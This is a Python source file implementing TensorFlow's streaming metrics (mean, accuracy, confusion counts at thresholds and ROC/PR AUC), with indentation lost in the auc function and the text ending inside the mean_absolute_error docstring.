code
stringlengths 1
25.8M
| language
stringclasses 18
values | source
stringclasses 4
values | repo
stringclasses 78
values | path
stringlengths 0
268
|
|---|---|---|---|---|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of tf.metrics module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import confusion_matrix
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sets
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import weights_broadcast_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import distribution_strategy_context
from tensorflow.python.util.deprecation import deprecated
from tensorflow.python.util.tf_export import tf_export
def metric_variable(shape, dtype, validate_shape=True, name=None):
  """Create variable in `GraphKeys.(LOCAL|METRIC_VARIABLES)` collections.

  If running in a `DistributionStrategy` context, the variable will be
  "replica local". This means:

  * The returned object will be a container with separate variables
    per replica of the model.

  * When writing to the variable, e.g. using `assign_add` in a metric
    update, the update will be applied to the variable local to the
    replica.

  * To get a metric's result value, we need to sum the variable values
    across the replicas before computing the final answer. Furthermore,
    the final answer should be computed once instead of in every
    replica. Both of these are accomplished by running the computation
    of the final result value inside
    `distribution_strategy_context.get_replica_context().merge_call(fn)`.
    Inside the `merge_call()`, ops are only added to the graph once
    and access to a replica-local variable in a computation returns
    the sum across all replicas.

  Args:
    shape: Shape of the created variable.
    dtype: Type of the created variable.
    validate_shape: (Optional) Whether shape validation is enabled for
      the created variable.
    name: (Optional) String name of the created variable.

  Returns:
    A (non-trainable) variable initialized to zero, or if inside a
    `DistributionStrategy` scope a replica-local variable container.
  """
  # Zero-initializer deferred in a callable so the variable can be
  # re-created per replica under a DistributionStrategy.
  zeros_initializer = lambda: array_ops.zeros(shape, dtype)
  metric_collections = [
      ops.GraphKeys.LOCAL_VARIABLES,
      ops.GraphKeys.METRIC_VARIABLES,
  ]
  # Note that synchronization "ON_READ" implies trainable=False.
  return variable_scope.variable(
      zeros_initializer,
      collections=metric_collections,
      validate_shape=validate_shape,
      synchronization=variable_scope.VariableSynchronization.ON_READ,
      aggregation=variable_scope.VariableAggregation.SUM,
      name=name)
def _remove_squeezable_dimensions(predictions, labels, weights):
  """Squeeze or expand last dim if needed.

  Squeezes last dim of `predictions` or `labels` if their rank differs by 1
  (using confusion_matrix.remove_squeezable_dimensions).

  Squeezes or expands last dim of `weights` if its rank differs by 1 from the
  new rank of `predictions`. If `weights` is scalar, it is kept scalar.

  This will use static shape if available. Otherwise, it will add graph
  operations, which could result in a performance hit.

  Args:
    predictions: Predicted values, a `Tensor` of arbitrary dimensions.
    labels: Optional label `Tensor` whose dimensions match `predictions`.
    weights: Optional weight scalar or `Tensor` whose dimensions match
      `predictions`.

  Returns:
    Tuple of `predictions`, `labels` and `weights`. Each of them possibly has
    the last dimension squeezed, `weights` could be extended by one dimension.
  """
  predictions = ops.convert_to_tensor(predictions)
  if labels is not None:
    labels, predictions = confusion_matrix.remove_squeezable_dimensions(
        labels, predictions)
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())

  if weights is None:
    return predictions, labels, None

  weights = ops.convert_to_tensor(weights)
  weights_shape = weights.get_shape()
  weights_rank = weights_shape.ndims
  if weights_rank == 0:
    # Scalar weights broadcast against any predictions shape; no adjustment.
    return predictions, labels, weights

  predictions_shape = predictions.get_shape()
  predictions_rank = predictions_shape.ndims
  if (predictions_rank is not None) and (weights_rank is not None):
    # Use static rank.
    if weights_rank - predictions_rank == 1:
      weights = array_ops.squeeze(weights, [-1])
    elif predictions_rank - weights_rank == 1:
      weights = array_ops.expand_dims(weights, [-1])
  else:
    # Use dynamic rank.
    weights_rank_tensor = array_ops.rank(weights)
    rank_diff = weights_rank_tensor - array_ops.rank(predictions)

    def _maybe_expand_weights():
      # Expand only when weights rank is exactly one less than predictions.
      return control_flow_ops.cond(
          math_ops.equal(rank_diff, -1),
          lambda: array_ops.expand_dims(weights, [-1]), lambda: weights)

    # Don't attempt squeeze if it will fail based on static check.
    if ((weights_rank is not None) and
        (not weights_shape.dims[-1].is_compatible_with(1))):
      maybe_squeeze_weights = lambda: weights
    else:
      maybe_squeeze_weights = lambda: array_ops.squeeze(weights, [-1])

    def _maybe_adjust_weights():
      # Squeeze when weights has one extra dim, else consider expanding.
      return control_flow_ops.cond(
          math_ops.equal(rank_diff, 1), maybe_squeeze_weights,
          _maybe_expand_weights)

    # If weights are scalar, do nothing. Otherwise, try to add or remove a
    # dimension to match predictions.
    weights = control_flow_ops.cond(
        math_ops.equal(weights_rank_tensor, 0), lambda: weights,
        _maybe_adjust_weights)
  return predictions, labels, weights
def _maybe_expand_labels(labels, predictions):
  """If necessary, expand `labels` along last dimension to match `predictions`.

  Args:
    labels: `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN]. The latter implies
      num_labels=1, in which case the result is an expanded `labels` with shape
      [D1, ... DN, 1].
    predictions: `Tensor` with shape [D1, ... DN, num_classes].

  Returns:
    `labels` with the same rank as `predictions`.

  Raises:
    ValueError: if `labels` has invalid shape.
  """
  with ops.name_scope(None, 'expand_labels', (labels, predictions)) as scope:
    labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)

    # If sparse, expand sparse shape (dense rank for a SparseTensor is the
    # size of its dense_shape vector, hence the rank comparison below).
    if isinstance(labels, sparse_tensor.SparseTensor):
      return control_flow_ops.cond(
          math_ops.equal(
              array_ops.rank(predictions),
              array_ops.size(labels.dense_shape) + 1),
          lambda: sparse_ops.sparse_reshape(  # pylint: disable=g-long-lambda
              labels,
              shape=array_ops.concat((labels.dense_shape, (1,)), 0),
              name=scope),
          lambda: labels)

    # Otherwise, try to use static shape.
    labels_rank = labels.get_shape().ndims
    if labels_rank is not None:
      predictions_rank = predictions.get_shape().ndims
      if predictions_rank is not None:
        if predictions_rank == labels_rank:
          return labels
        if predictions_rank == labels_rank + 1:
          return array_ops.expand_dims(labels, -1, name=scope)
        # Any other rank difference cannot be reconciled here.
        raise ValueError(
            'Unexpected labels shape %s for predictions shape %s.' %
            (labels.get_shape(), predictions.get_shape()))

    # Otherwise, use dynamic shape.
    return control_flow_ops.cond(
        math_ops.equal(array_ops.rank(predictions),
                       array_ops.rank(labels) + 1),
        lambda: array_ops.expand_dims(labels, -1, name=scope), lambda: labels)
def _safe_div(numerator, denominator, name):
  """Divides two tensors element-wise, returning 0 if the denominator is <= 0.

  Args:
    numerator: A real `Tensor`.
    denominator: A real `Tensor`, with dtype matching `numerator`.
    name: Name for the returned op.

  Returns:
    0 if `denominator` <= 0, else `numerator` / `denominator`
  """
  # Prefer the fused op once the forward-compatibility window has passed.
  if compat.forward_compatible(2018, 11, 1):
    return math_ops.div_no_nan(numerator, denominator)
  quotient = math_ops.truediv(numerator, denominator)
  zeros = array_ops.zeros_like(quotient, dtype=denominator.dtype)
  denominator_is_positive = math_ops.greater(denominator, zeros)
  zeros = math_ops.cast(zeros, quotient.dtype)
  return array_ops.where(denominator_is_positive, quotient, zeros, name=name)
def _safe_scalar_div(numerator, denominator, name):
  """Divides two values, returning 0 if the denominator is 0.

  Args:
    numerator: A scalar `float64` `Tensor`.
    denominator: A scalar `float64` `Tensor`.
    name: Name for the returned op.

  Returns:
    0 if `denominator` == 0, else `numerator` / `denominator`
  """
  # Both operands must be at most rank 1; the checks raise at graph
  # construction time if the static shapes are incompatible.
  for operand in (numerator, denominator):
    operand.get_shape().with_rank_at_most(1)
  return _safe_div(numerator, denominator, name=name)
def _streaming_confusion_matrix(labels, predictions, num_classes, weights=None):
  """Calculate a streaming confusion matrix.

  Calculates a confusion matrix. For estimation over a stream of data,
  the function creates an `update_op` operation.

  Args:
    labels: A `Tensor` of ground truth labels with shape [batch size] and of
      type `int32` or `int64`. The tensor will be flattened if its rank > 1.
    predictions: A `Tensor` of prediction results for semantic labels, whose
      shape is [batch size] and type `int32` or `int64`. The tensor will be
      flattened if its rank > 1.
    num_classes: The possible number of labels the prediction task can
      have. This value must be provided, since a confusion matrix of
      dimension = [num_classes, num_classes] will be allocated.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).

  Returns:
    total_cm: A `Tensor` representing the confusion matrix.
    update_op: An operation that increments the confusion matrix.
  """
  # Local accumulator variable holding the confusion counts seen so far.
  total_cm = metric_variable(
      [num_classes, num_classes], dtypes.float64, name='total_confusion_matrix')

  # confusion_matrix ops require int64 inputs.
  predictions = math_ops.to_int64(predictions)
  labels = math_ops.to_int64(labels)
  num_classes = math_ops.to_int64(num_classes)

  # Collapse any inputs of rank > 1 down to vectors.
  if predictions.get_shape().ndims > 1:
    predictions = array_ops.reshape(predictions, [-1])
  if labels.get_shape().ndims > 1:
    labels = array_ops.reshape(labels, [-1])
  if (weights is not None) and (weights.get_shape().ndims > 1):
    weights = array_ops.reshape(weights, [-1])

  # Fold the current batch's confusion counts into the accumulator.
  batch_cm = confusion_matrix.confusion_matrix(
      labels, predictions, num_classes, weights=weights, dtype=dtypes.float64)
  update_op = state_ops.assign_add(total_cm, batch_cm)
  return total_cm, update_op
def _aggregate_across_replicas(metrics_collections, metric_value_fn, *args):
  """Aggregate metric value across replicas.

  Args:
    metrics_collections: Optional list of collections the computed metric
      value is added to.
    metric_value_fn: Callable computing the metric value; invoked once in a
      cross-replica context via `merge_call`, receiving the distribution
      object followed by `*args`.
    *args: Arguments forwarded to `metric_value_fn`.

  Returns:
    The metric value `Tensor` returned by `metric_value_fn`.
  """
  def fn(distribution, *a):
    """Call `metric_value_fn` in the correct control flow context."""
    if hasattr(distribution, '_outer_control_flow_context'):
      # If there was an outer context captured before this method was called,
      # then we enter that context to create the metric value op. If the
      # captured context is `None`, ops.control_dependencies(None) gives the
      # desired behavior. Else we use `Enter` and `Exit` to enter and exit the
      # captured context.
      # This special handling is needed because sometimes the metric is created
      # inside a while_loop (and perhaps a TPU rewrite context). But we don't
      # want the value op to be evaluated every step or on the TPU. So we
      # create it outside so that it can be evaluated at the end on the host,
      # once the update ops have been evaluated.

      # pylint: disable=protected-access
      if distribution._outer_control_flow_context is None:
        with ops.control_dependencies(None):
          metric_value = metric_value_fn(distribution, *a)
      else:
        distribution._outer_control_flow_context.Enter()
        metric_value = metric_value_fn(distribution, *a)
        distribution._outer_control_flow_context.Exit()
      # pylint: enable=protected-access
    else:
      metric_value = metric_value_fn(distribution, *a)
    if metrics_collections:
      ops.add_to_collections(metrics_collections, metric_value)
    return metric_value

  return distribution_strategy_context.get_replica_context().merge_call(
      fn, *args)
@tf_export('metrics.mean')
def mean(values,
         weights=None,
         metrics_collections=None,
         updates_collections=None,
         name=None):
  """Computes the (weighted) mean of the given values.

  The `mean` function creates two local variables, `total` and `count`
  that are used to compute the average of `values`. This average is ultimately
  returned as `mean` which is an idempotent operation that simply divides
  `total` by `count`.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the `mean`.
  `update_op` increments `total` with the reduced sum of the product of `values`
  and `weights`, and it increments `count` with the reduced sum of `weights`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    values: A `Tensor` of arbitrary dimensions.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and must be broadcastable to `values` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `values` dimension).
    metrics_collections: An optional list of collections that `mean`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    mean: A `Tensor` representing the current mean, the value of `total` divided
      by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `mean_value`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match `values`,
      or if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean is not supported when eager execution '
                       'is enabled.')

  with variable_scope.variable_scope(name, 'mean', (values, weights)):
    values = math_ops.to_float(values)

    # Streaming state: running sum and running (weighted) element count.
    total = metric_variable([], dtypes.float32, name='total')
    count = metric_variable([], dtypes.float32, name='count')

    if weights is None:
      count_increment = math_ops.to_float(array_ops.size(values))
    else:
      values, _, weights = _remove_squeezable_dimensions(
          predictions=values, labels=None, weights=weights)
      weights = weights_broadcast_ops.broadcast_weights(
          math_ops.to_float(weights), values)
      values = math_ops.multiply(values, weights)
      count_increment = math_ops.reduce_sum(weights)

    total_update = state_ops.assign_add(total, math_ops.reduce_sum(values))
    # Gate the count update on `values` so weight-broadcast assertions run
    # before the count is touched.
    with ops.control_dependencies([values]):
      count_update = state_ops.assign_add(count, count_increment)

    def compute_mean(_, running_total, running_count):
      return _safe_div(
          running_total, math_ops.maximum(running_count, 0), name='value')

    mean_value = _aggregate_across_replicas(
        metrics_collections, compute_mean, total, count)

    update_op = _safe_div(total_update,
                          math_ops.maximum(count_update, 0),
                          name='update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)

    return mean_value, update_op
@tf_export('metrics.accuracy')
def accuracy(labels,
             predictions,
             weights=None,
             metrics_collections=None,
             updates_collections=None,
             name=None):
  """Calculates how often `predictions` matches `labels`.

  The `accuracy` function creates two local variables, `total` and
  `count` that are used to compute the frequency with which `predictions`
  matches `labels`. This frequency is ultimately returned as `accuracy`: an
  idempotent operation that simply divides `total` by `count`.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the `accuracy`.
  Internally, an `is_correct` operation computes a `Tensor` with elements 1.0
  where the corresponding elements of `predictions` and `labels` match and 0.0
  otherwise. Then `update_op` increments `total` with the reduced sum of the
  product of `weights` and `is_correct`, and it increments `count` with the
  reduced sum of `weights`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    labels: The ground truth values, a `Tensor` whose shape matches
      `predictions`.
    predictions: The predicted values, a `Tensor` of any shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that `accuracy` should
      be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.

  Returns:
    accuracy: A `Tensor` representing the accuracy, the value of `total` divided
      by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `accuracy`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.accuracy is not supported when eager '
                       'execution is enabled.')

  predictions, labels, weights = _remove_squeezable_dimensions(
      predictions=predictions, labels=labels, weights=weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  # Compare in the labels dtype so equality is well-defined.
  if labels.dtype != predictions.dtype:
    predictions = math_ops.cast(predictions, labels.dtype)
  matches = math_ops.to_float(math_ops.equal(predictions, labels))
  # Accuracy is simply the (weighted) mean of the 0/1 match indicator.
  return mean(matches, weights, metrics_collections, updates_collections,
              name or 'accuracy')
def _confusion_matrix_at_thresholds(labels,
                                    predictions,
                                    thresholds,
                                    weights=None,
                                    includes=None):
  """Computes true_positives, false_negatives, true_negatives, false_positives.

  This function creates up to four local variables, `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives`.
  `true_positive[i]` is defined as the total weight of values in `predictions`
  above `thresholds[i]` whose corresponding entry in `labels` is `True`.
  `false_negatives[i]` is defined as the total weight of values in `predictions`
  at most `thresholds[i]` whose corresponding entry in `labels` is `True`.
  `true_negatives[i]` is defined as the total weight of values in `predictions`
  at most `thresholds[i]` whose corresponding entry in `labels` is `False`.
  `false_positives[i]` is defined as the total weight of values in `predictions`
  above `thresholds[i]` whose corresponding entry in `labels` is `False`.

  For estimation of these metrics over a stream of data, for each metric the
  function respectively creates an `update_op` operation that updates the
  variable and returns its value.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    labels: A `Tensor` whose shape matches `predictions`. Will be cast to
      `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    includes: Tuple of keys to return, from 'tp', 'fn', 'tn', fp'. If `None`,
      default to all four.

  Returns:
    values: Dict of variables of shape `[len(thresholds)]`. Keys are from
      `includes`.
    update_ops: Dict of operations that increments the `values`. Keys are from
      `includes`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      `includes` contains invalid keys.
  """
  all_includes = ('tp', 'fn', 'tn', 'fp')
  if includes is None:
    includes = all_includes
  else:
    # Validate requested keys up front so we fail fast on typos.
    for include in includes:
      if include not in all_includes:
        raise ValueError('Invalid key: %s.' % include)

  # Runtime range check: predictions must lie in [0, 1] for thresholding
  # against the given thresholds to be meaningful.
  with ops.control_dependencies([
      check_ops.assert_greater_equal(
          predictions,
          math_ops.cast(0.0, dtype=predictions.dtype),
          message='predictions must be in [0, 1]'),
      check_ops.assert_less_equal(
          predictions,
          math_ops.cast(1.0, dtype=predictions.dtype),
          message='predictions must be in [0, 1]')
  ]):
    predictions, labels, weights = _remove_squeezable_dimensions(
        predictions=math_ops.to_float(predictions),
        labels=math_ops.cast(labels, dtype=dtypes.bool),
        weights=weights)

  num_thresholds = len(thresholds)

  # Reshape predictions and labels so comparisons below broadcast to a
  # [num_thresholds, num_predictions] matrix.
  predictions_2d = array_ops.reshape(predictions, [-1, 1])
  labels_2d = array_ops.reshape(
      math_ops.cast(labels, dtype=dtypes.bool), [1, -1])

  # Use static shape if known.
  num_predictions = predictions_2d.get_shape().as_list()[0]

  # Otherwise use dynamic shape.
  if num_predictions is None:
    num_predictions = array_ops.shape(predictions_2d)[0]
  # One row of thresholds per prediction column: [num_thresholds, num_preds].
  thresh_tiled = array_ops.tile(
      array_ops.expand_dims(array_ops.constant(thresholds), [1]),
      array_ops.stack([1, num_predictions]))

  # Tile the predictions after thresholding them across different thresholds.
  pred_is_pos = math_ops.greater(
      array_ops.tile(array_ops.transpose(predictions_2d), [num_thresholds, 1]),
      thresh_tiled)
  if ('fn' in includes) or ('tn' in includes):
    pred_is_neg = math_ops.logical_not(pred_is_pos)

  # Tile labels by number of thresholds
  label_is_pos = array_ops.tile(labels_2d, [num_thresholds, 1])
  if ('fp' in includes) or ('tn' in includes):
    label_is_neg = math_ops.logical_not(label_is_pos)

  if weights is not None:
    weights = weights_broadcast_ops.broadcast_weights(
        math_ops.to_float(weights), predictions)
    weights_tiled = array_ops.tile(
        array_ops.reshape(weights, [1, -1]), [num_thresholds, 1])
    thresh_tiled.get_shape().assert_is_compatible_with(
        weights_tiled.get_shape())
  else:
    weights_tiled = None

  values = {}
  update_ops = {}

  # Each requested count gets its own accumulator variable and an update op
  # that adds this batch's (optionally weighted) per-threshold counts.
  if 'tp' in includes:
    true_p = metric_variable(
        [num_thresholds], dtypes.float32, name='true_positives')
    is_true_positive = math_ops.to_float(
        math_ops.logical_and(label_is_pos, pred_is_pos))
    if weights_tiled is not None:
      is_true_positive *= weights_tiled
    update_ops['tp'] = state_ops.assign_add(true_p,
                                            math_ops.reduce_sum(
                                                is_true_positive, 1))
    values['tp'] = true_p

  if 'fn' in includes:
    false_n = metric_variable(
        [num_thresholds], dtypes.float32, name='false_negatives')
    is_false_negative = math_ops.to_float(
        math_ops.logical_and(label_is_pos, pred_is_neg))
    if weights_tiled is not None:
      is_false_negative *= weights_tiled
    update_ops['fn'] = state_ops.assign_add(false_n,
                                            math_ops.reduce_sum(
                                                is_false_negative, 1))
    values['fn'] = false_n

  if 'tn' in includes:
    true_n = metric_variable(
        [num_thresholds], dtypes.float32, name='true_negatives')
    is_true_negative = math_ops.to_float(
        math_ops.logical_and(label_is_neg, pred_is_neg))
    if weights_tiled is not None:
      is_true_negative *= weights_tiled
    update_ops['tn'] = state_ops.assign_add(true_n,
                                            math_ops.reduce_sum(
                                                is_true_negative, 1))
    values['tn'] = true_n

  if 'fp' in includes:
    false_p = metric_variable(
        [num_thresholds], dtypes.float32, name='false_positives')
    is_false_positive = math_ops.to_float(
        math_ops.logical_and(label_is_neg, pred_is_pos))
    if weights_tiled is not None:
      is_false_positive *= weights_tiled
    update_ops['fp'] = state_ops.assign_add(false_p,
                                            math_ops.reduce_sum(
                                                is_false_positive, 1))
    values['fp'] = false_p

  return values, update_ops
def _aggregate_variable(v, collections):
  """Read a metric variable's value, aggregated across replicas."""
  def read_value(distribution, value):
    return distribution.read_var(value)

  return _aggregate_across_replicas(collections, read_value, v)
@tf_export('metrics.auc')
def auc(labels,
predictions,
weights=None,
num_thresholds=200,
metrics_collections=None,
updates_collections=None,
curve='ROC',
name=None,
summation_method='trapezoidal'):
"""Computes the approximate AUC via a Riemann sum.
The `auc` function creates four local variables, `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` that are used to
compute the AUC. To discretize the AUC curve, a linearly spaced set of
thresholds is used to compute pairs of recall and precision values. The area
under the ROC-curve is therefore computed using the height of the recall
values by the false positive rate, while the area under the PR-curve is the
computed using the height of the precision values by the recall.
This value is ultimately returned as `auc`, an idempotent operation that
computes the area under a discretized curve of precision versus recall values
(computed using the aforementioned variables). The `num_thresholds` variable
controls the degree of discretization with larger numbers of thresholds more
closely approximating the true AUC. The quality of the approximation may vary
dramatically depending on `num_thresholds`.
For best results, `predictions` should be distributed approximately uniformly
in the range [0, 1] and not peaked around 0 or 1. The quality of the AUC
approximation may be poor if this is not the case. Setting `summation_method`
to 'minoring' or 'majoring' can help quantify the error in the approximation
by providing lower or upper bound estimate of the AUC.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `auc`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. Will be cast to
`bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
num_thresholds: The number of thresholds to use when discretizing the roc
curve.
metrics_collections: An optional list of collections that `auc` should be
added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
curve: Specifies the name of the curve to be computed, 'ROC' [default] or
'PR' for the Precision-Recall-curve.
name: An optional variable_scope name.
summation_method: Specifies the Riemann summation method used
(https://en.wikipedia.org/wiki/Riemann_sum): 'trapezoidal' [default] that
applies the trapezoidal rule; 'careful_interpolation', a variant of it
differing only by a more correct interpolation scheme for PR-AUC -
interpolating (true/false) positives but not the ratio that is precision;
'minoring' that applies left summation for increasing intervals and right
summation for decreasing intervals; 'majoring' that does the opposite.
Note that 'careful_interpolation' is strictly preferred to 'trapezoidal'
(to be deprecated soon) as it applies the same method for ROC, and a
better one (see Davis & Goadrich 2006 for details) for the PR curve.
Returns:
auc: A scalar `Tensor` representing the current area-under-curve.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables
appropriately and whose value matches `auc`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.auc is not supported when eager execution '
'is enabled.')
with variable_scope.variable_scope(name, 'auc',
(labels, predictions, weights)):
if curve != 'ROC' and curve != 'PR':
raise ValueError('curve must be either ROC or PR, %s unknown' % (curve))
kepsilon = 1e-7 # to account for floating point imprecisions
thresholds = [
(i + 1) * 1.0 / (num_thresholds - 1) for i in range(num_thresholds - 2)
]
thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights)
# Add epsilons to avoid dividing by 0.
epsilon = 1.0e-6
def interpolate_pr_auc(tp, fp, fn):
"""Interpolation formula inspired by section 4 of Davis & Goadrich 2006.
Note here we derive & use a closed formula not present in the paper
- as follows:
Modeling all of TP (true positive weight),
FP (false positive weight) and their sum P = TP + FP (positive weight)
as varying linearly within each interval [A, B] between successive
thresholds, we get
Precision = (TP_A + slope * (P - P_A)) / P
with slope = dTP / dP = (TP_B - TP_A) / (P_B - P_A).
The area within the interval is thus (slope / total_pos_weight) times
int_A^B{Precision.dP} = int_A^B{(TP_A + slope * (P - P_A)) * dP / P}
int_A^B{Precision.dP} = int_A^B{slope * dP + intercept * dP / P}
where intercept = TP_A - slope * P_A = TP_B - slope * P_B, resulting in
int_A^B{Precision.dP} = TP_B - TP_A + intercept * log(P_B / P_A)
Bringing back the factor (slope / total_pos_weight) we'd put aside, we get
slope * [dTP + intercept * log(P_B / P_A)] / total_pos_weight
where dTP == TP_B - TP_A.
Note that when P_A == 0 the above calculation simplifies into
int_A^B{Precision.dTP} = int_A^B{slope * dTP} = slope * (TP_B - TP_A)
which is really equivalent to imputing constant precision throughout the
first bucket having >0 true positives.
Args:
tp: true positive counts
fp: false positive counts
fn: false negative counts
Returns:
pr_auc: an approximation of the area under the P-R curve.
"""
dtp = tp[:num_thresholds - 1] - tp[1:]
p = tp + fp
prec_slope = _safe_div(
dtp,
math_ops.maximum(p[:num_thresholds - 1] - p[1:], 0),
name='prec_slope')
intercept = tp[1:] - math_ops.multiply(prec_slope, p[1:])
safe_p_ratio = array_ops.where(
math_ops.logical_and(p[:num_thresholds - 1] > 0, p[1:] > 0),
_safe_div(p[:num_thresholds - 1],
math_ops.maximum(p[1:], 0),
name='recall_relative_ratio'),
array_ops.ones_like(p[1:]))
return math_ops.reduce_sum(
_safe_div(
prec_slope * (dtp + intercept * math_ops.log(safe_p_ratio)),
math_ops.maximum(tp[1:] + fn[1:], 0),
name='pr_auc_increment'),
name='interpolate_pr_auc')
def compute_auc(tp, fn, tn, fp, name):
"""Computes the roc-auc or pr-auc based on confusion counts."""
if curve == 'PR':
if summation_method == 'trapezoidal':
logging.warning(
'Trapezoidal rule is known to produce incorrect PR-AUCs; '
'please switch to "careful_interpolation" instead.')
elif summation_method == 'careful_interpolation':
# This one is a bit tricky and is handled separately.
return interpolate_pr_auc(tp, fp, fn)
rec = math_ops.div(tp + epsilon, tp + fn + epsilon)
if curve == 'ROC':
fp_rate = math_ops.div(fp, fp + tn + epsilon)
x = fp_rate
y = rec
else: # curve == 'PR'.
prec = math_ops.div(tp + epsilon, tp + fp + epsilon)
x = rec
y = prec
if summation_method in ('trapezoidal', 'careful_interpolation'):
# Note that the case ('PR', 'careful_interpolation') has been handled
# above.
return math_ops.reduce_sum(
math_ops.multiply(x[:num_thresholds - 1] - x[1:],
(y[:num_thresholds - 1] + y[1:]) / 2.),
name=name)
elif summation_method == 'minoring':
return math_ops.reduce_sum(
math_ops.multiply(x[:num_thresholds - 1] - x[1:],
math_ops.minimum(y[:num_thresholds - 1], y[1:])),
name=name)
elif summation_method == 'majoring':
return math_ops.reduce_sum(
math_ops.multiply(x[:num_thresholds - 1] - x[1:],
math_ops.maximum(y[:num_thresholds - 1], y[1:])),
name=name)
else:
raise ValueError('Invalid summation_method: %s' % summation_method)
# sum up the areas of all the trapeziums
  def compute_auc_value(_, values):
    # Cross-replica aggregation callback: computes the AUC 'value' tensor
    # from the aggregated confusion-count dict produced above.
    return compute_auc(values['tp'], values['fn'], values['tn'], values['fp'],
                       'value')
auc_value = _aggregate_across_replicas(
metrics_collections, compute_auc_value, values)
update_op = compute_auc(update_ops['tp'], update_ops['fn'],
update_ops['tn'], update_ops['fp'], 'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return auc_value, update_op
@tf_export('metrics.mean_absolute_error')
def mean_absolute_error(labels,
                        predictions,
                        weights=None,
                        metrics_collections=None,
                        updates_collections=None,
                        name=None):
  """Computes the mean absolute error between the labels and predictions.

  Two local variables, `total` and `count`, accumulate the (optionally
  `weights`-weighted) absolute differences `|predictions - labels|`. The
  metric value is the idempotent ratio `total / count`; the returned
  `update_op` folds a new batch into both accumulators for streaming
  estimation.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`.
    metrics_collections: An optional list of collections that
      `mean_absolute_error` should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    mean_absolute_error: A `Tensor` representing the current `total / count`.
    update_op: An operation that increments `total` and `count` and whose
      value matches `mean_absolute_error`.

